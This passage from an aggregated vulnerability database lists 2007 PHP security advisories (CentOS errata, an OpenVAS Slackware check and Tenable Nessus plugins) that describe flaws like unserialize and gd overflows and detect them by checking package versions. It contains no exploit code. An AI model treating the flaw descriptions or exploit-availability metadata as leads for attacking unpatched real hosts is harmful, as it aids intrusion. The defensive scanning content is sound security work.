http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.2.2-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.2.2-i486-1_slack11.0\", rls:\"SLK11.0\")) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-12T14:44:58", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:0155\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server.\r\n\r\nA denial of service flaw was found in the way PHP processed a deeply nested\r\narray. A remote attacker could cause the PHP interpreter to crash by\r\nsubmitting an input variable with a deeply nested array. (CVE-2007-1285) \r\n\r\nA flaw was found in the way PHP's unserialize() function processed data. If\r\na remote attacker was able to pass arbitrary data to PHP's unserialize()\r\nfunction, they could possibly execute arbitrary code as the apache user.\r\n(CVE-2007-1286)\r\n\r\nA flaw was found in the way the mbstring extension set global variables. 
A\r\nscript which used the mb_parse_str() function to set global variables could\r\nbe forced to enable the register_globals configuration option, possibly\r\nresulting in global variable injection. (CVE-2007-1583)\r\n\r\nA double free flaw was found in PHP's session_decode() function. If a\r\nremote attacker was able to pass arbitrary data to PHP's session_decode()\r\nfunction, they could possibly execute arbitrary code as the apache user.\r\n(CVE-2007-1711)\r\n\r\nA flaw was discovered in the way PHP's mail() function processed header\r\ndata. If a script sent mail using a Subject header containing a string from\r\nan untrusted source, a remote attacker could send bulk e-mail to unintended\r\nrecipients. (CVE-2007-1718)\r\n\r\nA heap based buffer overflow flaw was discovered in PHP's gd extension. A\r\nscript that could be forced to process WBMP images from an untrusted source\r\ncould result in arbitrary code execution. (CVE-2007-1001)\r\n\r\nA buffer over-read flaw was discovered in PHP's gd extension. A script that\r\ncould be forced to write arbitrary string using a JIS font from an\r\nuntrusted source could cause the PHP interpreter to crash. 
(CVE-2007-0455)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013669.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013672.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013677.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013678.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013679.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013680.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013682.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013683.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-domxml\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pear\nphp-pgsql\nphp-snmp\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0155.html", "modified": "2007-04-17T09:40:12", "published": "2007-04-16T16:16:21", "href": "http://lists.centos.org/pipermail/centos-announce/2007-April/013669.html", "id": "CESA-2007:0155", "title": "php security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2017-10-03T18:24:42", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:0153\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA flaw was found in the way the mbstring extension set global variables. A\r\nscript which used the mb_parse_str() function to set global variables could\r\nbe forced to enable the register_globals configuration option, possibly\r\nresulting in global variable injection. (CVE-2007-1583)\r\n\r\nA heap based buffer overflow flaw was discovered in PHP's gd extension. 
A\r\nscript that could be forced to process WBMP images from an untrusted source\r\ncould result in arbitrary code execution. (CVE-2007-1001)\r\n\r\nA buffer over-read flaw was discovered in PHP's gd extension. A script that\r\ncould be forced to write arbitrary string using a JIS font from an\r\nuntrusted source could cause the PHP interpreter to crash. (CVE-2007-0455)\r\n\r\nA flaw was discovered in the way PHP's mail() function processed header\r\ndata. If a script sent mail using a Subject header containing a string from\r\nan untrusted source, a remote attacker could send bulk e-mail to unintended\r\nrecipients. (CVE-2007-1718)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013694.html\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013695.html\n\n**Affected packages:**\nphp\nphp-bcmath\nphp-cli\nphp-common\nphp-dba\nphp-devel\nphp-gd\nphp-imap\nphp-ldap\nphp-mbstring\nphp-mysql\nphp-ncurses\nphp-odbc\nphp-pdo\nphp-pgsql\nphp-snmp\nphp-soap\nphp-xml\nphp-xmlrpc\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2007-0153.html", "modified": "2007-04-21T13:47:12", "published": "2007-04-21T13:47:06", "href": "http://lists.centos.org/pipermail/centos-announce/2007-April/013694.html", "id": "CESA-2007:0153", "title": "php security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2018-01-25T01:01:51", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2007:0154-01\n\n\nPHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA denial of service flaw was found in the way PHP processed a deeply nested\r\narray. 
A remote attacker could cause the PHP interpreter to crash by\r\nsubmitting an input variable with a deeply nested array. (CVE-2007-1285)\r\n\r\nA flaw was found in the way PHP's unserialize() function processes data. If\r\na remote attacker is able to pass arbitrary data to PHP's unserialize()\r\nfunction, it may be possible for them to execute arbitrary code as the\r\napache user. (CVE-2007-1286)\r\n\r\nA double free flaw was found in PHP's session_decode() function. If a\r\nremote attacker is able to pass arbitrary data to PHP's session_decode()\r\nfunction, it may be possible for them to execute arbitrary code as the\r\napache user. (CVE-2007-1711)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2007-April/013681.html\n\n**Affected packages:**\nphp\nphp-devel\nphp-imap\nphp-ldap\nphp-manual\nphp-mysql\nphp-odbc\nphp-pgsql\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2007-04-17T01:50:13", "published": "2007-04-17T01:50:13", "href": "http://lists.centos.org/pipermail/centos-announce/2007-April/013681.html", "id": "CESA-2007:0154-01", "title": "php security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-01-16T20:16:24", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2007:0155 :\n\nUpdated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. 
A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processed\ndata. If a remote attacker was able to pass arbitrary data to PHP's\nunserialize() function, they could possibly execute arbitrary code as\nthe apache user. (CVE-2007-1286)\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker was able to pass arbitrary data to PHP's\nsession_decode() function, they could possibly execute arbitrary code\nas the apache user. (CVE-2007-1711)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. 
A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "modified": "2018-07-18T00:00:00", "published": "2013-07-12T00:00:00", "id": "ORACLELINUX_ELSA-2007-0155.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67471", "title": "Oracle Linux 3 / 4 : php (ELSA-2007-0155)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2007:0155 and \n# Oracle Linux Security Advisory ELSA-2007-0155 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67471);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/18 17:43:55\");\n\n script_cve_id(\"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1286\", \"CVE-2007-1583\", \"CVE-2007-1711\", \"CVE-2007-1718\");\n script_bugtraq_id(22764, 22765, 23016, 23145, 23357);\n script_xref(name:\"RHSA\", value:\"2007:0155\");\n\n script_name(english:\"Oracle Linux 3 / 4 : php (ELSA-2007-0155)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2007:0155 :\n\nUpdated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed 
a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processed\ndata. If a remote attacker was able to pass arbitrary data to PHP's\nunserialize() function, they could possibly execute arbitrary code as\nthe apache user. (CVE-2007-1286)\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker was able to pass arbitrary data to PHP's\nsession_decode() function, they could possibly execute arbitrary code\nas the apache user. (CVE-2007-1711)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. 
A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-April/000118.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-April/000121.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-devel-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-devel-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-imap-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-imap-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-ldap-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-ldap-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-mysql-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-mysql-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-odbc-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-odbc-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-pgsql-4.3.2-40.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.2-40.ent\")) flag++;\n\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-devel-4.3.9-3.22.4\")) 
flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-devel-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-domxml-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-domxml-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-gd-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-gd-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-imap-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-imap-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ldap-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ldap-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mbstring-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mbstring-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-mysql-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-mysql-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-ncurses-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-ncurses-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-odbc-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-odbc-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pear-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pear-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-pgsql-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.9-3.22.4\")) flag++;\nif 
(rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-snmp-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-snmp-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"php-xmlrpc-4.3.9-3.22.4\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"php-xmlrpc-4.3.9-3.22.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2019-01-16T20:07:16", "bulletinFamily": "scanner", "description": "Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processed\ndata. If a remote attacker was able to pass arbitrary data to PHP's\nunserialize() function, they could possibly execute arbitrary code as\nthe apache user. (CVE-2007-1286)\n\nA flaw was found in the way the mbstring extension set global\nvariables. 
A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA double free flaw was found in PHP's session_decode() function. If a\nremote attacker was able to pass arbitrary data to PHP's\nsession_decode() function, they could possibly execute arbitrary code\nas the apache user. (CVE-2007-1711)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.", "modified": "2018-11-16T00:00:00", "published": "2007-04-19T00:00:00", "id": "REDHAT-RHSA-2007-0155.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=25068", "title": "RHEL 3 / 4 : php (RHSA-2007:0155)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0155. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25068);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2018/11/16 15:19:26\");\n\n script_cve_id(\"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1286\", \"CVE-2007-1583\", \"CVE-2007-1711\", \"CVE-2007-1718\");\n script_bugtraq_id(22764, 22765, 23016, 23145, 23357);\n script_xref(name:\"RHSA\", value:\"2007:0155\");\n\n script_name(english:\"RHEL 3 / 4 : php (RHSA-2007:0155)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA denial of service flaw was found in the way PHP processed a deeply\nnested array. A remote attacker could cause the PHP interpreter to\ncrash by submitting an input variable with a deeply nested array.\n(CVE-2007-1285)\n\nA flaw was found in the way PHP's unserialize() function processed\ndata. If a remote attacker was able to pass arbitrary data to PHP's\nunserialize() function, they could possibly execute arbitrary code as\nthe apache user. (CVE-2007-1286)\n\nA flaw was found in the way the mbstring extension set global\nvariables. A script which used the mb_parse_str() function to set\nglobal variables could be forced to enable the register_globals\nconfiguration option, possibly resulting in global variable injection.\n(CVE-2007-1583)\n\nA double free flaw was found in PHP's session_decode() function. 
If a\nremote attacker was able to pass arbitrary data to PHP's\nsession_decode() function, they could possibly execute arbitrary code\nas the apache user. (CVE-2007-1711)\n\nA flaw was discovered in the way PHP's mail() function processed\nheader data. If a script sent mail using a Subject header containing a\nstring from an untrusted source, a remote attacker could send bulk\ne-mail to unintended recipients. (CVE-2007-1718)\n\nA heap based buffer overflow flaw was discovered in PHP's gd\nextension. A script that could be forced to process WBMP images from\nan untrusted source could result in arbitrary code execution.\n(CVE-2007-1001)\n\nA buffer over-read flaw was discovered in PHP's gd extension. A script\nthat could be forced to write arbitrary string using a JIS font from\nan untrusted source could cause the PHP interpreter to crash.\n(CVE-2007-0455)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-0455\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1001\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1285\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1286\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1583\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2007-1718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2007:0155\"\n );\n script_set_attribute(attribute:\"solution\", 
value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n 
